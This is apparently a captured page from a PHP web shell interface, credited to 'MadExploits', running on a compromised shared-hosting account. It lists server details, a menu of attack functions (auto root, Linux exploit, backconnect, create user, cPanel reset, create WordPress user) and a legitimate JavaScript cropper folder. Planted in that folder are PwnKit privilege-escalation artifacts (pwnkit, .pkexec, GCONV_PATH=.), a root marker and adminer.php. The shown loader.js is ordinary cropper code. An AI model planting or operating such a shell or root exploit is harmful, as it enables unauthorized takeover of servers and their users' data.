Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
js /
cropper /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
builder.LICENSE
1.08
KB
-rw----r--
builder.js
3.28
KB
-rw----r--
cropper.LICENSE
2.56
KB
-rw----r--
cropper.css
1.99
KB
-rw----r--
cropper.js
16.79
KB
-rw----r--
dragdrop.LICENSE
1.17
KB
-rw----r--
dragdrop.js
28.92
KB
-rw----r--
index.php
1.29
KB
-rw----r--
loader.js
1.68
KB
-rw----r--
prototype.LICENSE
1.07
KB
-rw----r--
prototype.js
53.85
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
scriptaculous.LICENSE
1.08
KB
-rw----r--
scriptaculous.js
2.19
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : loader.js
var CropImageManager = { curCrop: null, init: function() { this.attachCropper(); }, onChange: function(e) { var vals = $F(Event.element(e)).split('|'); this.setImage(vals[0], vals[1], vals[2]); }, setImage: function(imgSrc, w, h) { $('testImage').src = imgSrc; /*$('testImage').width = w; $('testImage').height = h;*/ this.attachCropper(w, h); }, attachCropper: function(maxW, maxH) { var vals = $F($('imageChoice')).split('|'); if (!maxW) maxW = vals[1]; if (!maxH) maxH = vals[2]; if (this.curCrop == null) this.curCrop = new Cropper.Img('testImage', { minWidth: maxW, minHeight: maxH, maxWidth: maxW, maxHeight: maxH, onEndCrop: onEndCrop } ); else this.curCrop.reset(maxW, maxH, maxW, maxH); this.curCrop.aeraCoords = 0; }, removeCropper: function() { if (this.curCrop != null) this.curCrop.remove(); }, resetCropper: function() { this.attachCropper(); } }; function onEndCrop(coords, dimensions) { var vals = $F($('imageChoice')).split('|'); var id_image = vals[3]; if (!image) { image = id_image; image_check = id_image; } if (image != id_image) image = id_image; else { if (image != image_check && navigator.appName != "Microsoft Internet Explorer") image_check = image; else { $(id_image + '_x1').value = coords.x1; $(id_image + '_y1').value = coords.y1; $(id_image + '_x2').value = coords.x2; $(id_image + '_y2').value = coords.y2; } } } Event.observe(window, 'load', function() { CropImageManager.init(); Event.observe($('imageChoice'), 'change', CropImageManager.onChange.bindAsEventListener(CropImageManager), false ); } ); var image; var image_check;
Close